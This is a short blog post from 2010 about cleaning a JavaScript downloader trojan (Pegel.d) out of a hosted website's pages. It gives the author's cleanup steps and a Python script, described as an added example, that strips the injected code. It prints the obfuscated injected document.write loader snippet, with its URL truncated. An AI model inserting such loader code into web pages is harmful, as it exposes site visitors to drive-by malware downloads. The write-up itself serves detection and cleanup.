小新二三事

Wednesday, January 27, 2010

trojan horse, virus report: Trojan Downloader JS Pegel d


http://www.viruslist.com/hch/search?VN=Trojan-Downloader.JS.Pegel.d
no information from this link

strange JavaScript was inserted into index.html, index.php, main.html, main.php, *.js
on the web hosting server

after checking:
the strange JavaScript runs in IE and Firefox,
creates an iframe,
and downloads a PDF, "ChangeLog.pdf",
from a ru website

ref:
http://bbs.janmeng.com/redirect.php?tid=915346&goto=lastpost

after I found the strange code:
update antivirus, PDF reader, browser

steps of my solution :
1. download files back to PC
2. files got deleted when antivirus activated
3. disable antivirus then download files
(zip a copy)
4. manually delete the JavaScript code from 10 files.
5. use notepad+ to search and replace javascript
6. enable antivirus then upload files


2 types of JavaScript to search and replace
type 1
<script>
/*Exception*/ document.write('<script src='+'h&t()$#t(p!(:!^...\!|\^|&/ig, '')+' defer=defer></scr'+'ipt>');
</script>
type 2
/*Exception*/ document.write('<script src='+'h&t()$#t(p!(:!^...\!|\^|&/ig, '')+' defer=defer></scr'+'ipt>');
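
The search and replace from steps 4 and 5 can be scripted over the local copy downloaded in step 1. This is an added example, not code from the original post: the function names, the backup directory and the sample payload are assumptions, and the two patterns are built only from the marker text visible in the snippets above.

```python
import re
import shutil
import tempfile
from pathlib import Path

# Marker text comes from the two snippets on this page. The obfuscated URL is elided
# there, so the pattern runs from the marker to the closing "</scr'+'ipt>');" on one line.
CALL = rb"/\*Exception\*/\s*document\.write\('<script src='\+[^\r\n]*?</scr'\+'ipt>'\);"
TYPE1 = re.compile(rb"<script>\s*" + CALL + rb"\s*</script>[ \t]*\r?\n?", re.I)  # wrapped form
TYPE2 = re.compile(CALL + rb"[ \t]*\r?\n?")  # bare form, as found in *.js
TARGETS = {"index.html", "index.php", "main.html", "main.php"}

# Constructed sample: same shape as the snippets above, with a placeholder payload.
SAMPLE = b"/*Exception*/ document.write('<script src='+'PLACEHOLDER'.replace(/!/ig, '')+' defer=defer></scr'+'ipt>');"

def strip_injection(data: bytes):
    """Return (cleaned bytes, number of snippets removed); type 1 is tried first."""
    data, wrapped = TYPE1.subn(b"", data)
    data, bare = TYPE2.subn(b"", data)
    return data, wrapped + bare

def clean_tree(root, backup_dir):
    """Clean the file types named in the post; copy each infected original to backup_dir."""
    root, backup_dir, report = Path(root), Path(backup_dir), {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or not (path.name in TARGETS or path.suffix == ".js"):
            continue
        cleaned, count = strip_injection(path.read_bytes())
        if count:
            rel = path.relative_to(root)
            (backup_dir / rel).parent.mkdir(parents=True, exist_ok=True)
            shutil.copy2(path, backup_dir / rel)  # keep the infected original for review
            path.write_bytes(cleaned)
            report[rel.as_posix()] = count
    return report

def demo():
    """Run against a constructed two-file site in a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        site, backup = Path(tmp, "site"), Path(tmp, "backup")
        (site / "js").mkdir(parents=True)
        (site / "index.html").write_bytes(b"<html><body>hi</body>\n<script>\n" + SAMPLE + b"\n</script>\n</html>\n")
        (site / "js" / "menu.js").write_bytes(b"var a = 1;\n" + SAMPLE + b"\n")
        report = clean_tree(site, backup)
        return report, (site / "index.html").read_bytes(), (site / "js" / "menu.js").read_bytes()

if __name__ == "__main__":
    print(demo())
```

Files are read and written as bytes so line endings and encodings in untouched parts of each file stay exactly as they were. The report lists every modified file, which gives a list to re-check after upload.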


hour to update and clear all files for 1 domain
total 8:


so bad luck
